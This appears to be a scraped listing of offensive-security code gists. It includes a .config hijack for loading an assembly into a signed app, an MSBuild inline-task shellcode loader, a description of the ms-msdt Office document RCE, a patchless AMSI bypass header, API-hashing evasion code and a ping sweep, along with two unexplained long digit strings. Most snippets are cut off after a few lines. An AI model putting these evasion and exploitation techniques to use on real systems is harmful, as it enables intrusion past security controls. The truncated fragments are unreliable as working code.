We can do this by experimenting with .config files.
Many defenders catch/detect files that are renamed, they do this by matching Original Filename to Process Name
In this example, we don't have to rename anything. We simple coerce a trusted signed app to load our Assembly.
We do this by directing the application to read a config file we provide.
| #!/bin/bash | |
| for ip in $(seq 1 254); do | |
| ping -c1 172.16.10.$ip |grep "bytes from " |cut -d" " -f 4|cut -d":" -f1 & | |
| done |
| #!/usr/bin/python | |
| import os | |
| for root, dirs, files, in os.walk(".", topdown=False): | |
| for name in files: | |
| print(os.path.join(root, name)) | |
| for name in dirs: | |
| print(os.path.join(root, name)) |
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- This inline task executes c# code. --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj --> | |
| <!-- Save This File And Execute The Above Command --> | |
| <!-- Original Author: Casey Smith, Twitter: @subTee --> | |
| <!-- Modified by John Baek, @exploitpreacher to use ntqueueapcthread (https://github.com/FuzzySecurity/Sharp-Suite/tree/master/UrbanBishop) --> | |
| <!-- License: BSD 3-Clause --> | |
| <Target Name="Hello"> | |
| <ClassExample /> | |
| </Target> |
MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).
The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).
Here are the steps to build a Proof-of-Concept docx:
| /*! | |
| * | |
| * ROGUE | |
| * | |
| * GuidePoint Security LLC | |
| * | |
| * Threat and Attack Simulation | |
| * little tip: race condition at the RtlGetCtx so make a rop that sends an event if the rtl call finished | |
| !*/ |
| // Copyright (C) 2022 Evan McBroom | |
| // If you are using Visual Studio, you will need to disable the "Edit and Continue" feature. | |
| // Prng based off of Parker Miller's | |
| // "Multiplicative Linear Congruential Generator" | |
| // https://en.wikipedia.org/wiki/Lehmer_random_number_generator | |
| namespace mlcg { | |
| constexpr uint32_t modulus() { | |
| return 0x7fffffff; | |
| } |
16683189189467061193223884768707748125115707836338683708165636755281807331517563442745553664246724105870945763631169132260927526462734007835204880152893128450692630721572368535326118279180786621255867502609753166175114825563868872386555313011639026159359514256068100949221759953685226158201564474886176814194560402374867089196278252086615234757715302275261377043585010851175293923132633446346692061723922182900523634608569996664845671316859814804344017463762348282301284946271053184374916659024239637068041261659983151054361127497750752691523039603283781627522436175359723245473438312970933225984151370749165828689332628371556231892597912020228904274172
166831891894670611932238847687077481251157078363386837081656367552818073315175634427455536642467241058709457636311691322609275264627340078352048801528931284506926307215723685353261182791807866212558675026097531661751148255638688723865553130116390261593595142560681009492217599536852261582015644748861768141945604023748670891962782520866152347577153022752613770435850
| #ifndef PATCHLESS_AMSI_H | |
| #define PATCHLESS_AMSI_H | |
| #include <windows.h> | |
| static const int AMSI_RESULT_CLEAN = 0; | |
| PVOID g_amsiScanBufferPtr = nullptr; | |
| unsigned long long setBits(unsigned long long dw, int lowBit, int bits, unsigned long long newValue) { |
| using System; | |
| using System.Runtime.InteropServices; | |
| namespace API_Hashing | |
| { | |
| class Program | |
| { | |
| [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] | |
| static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName); |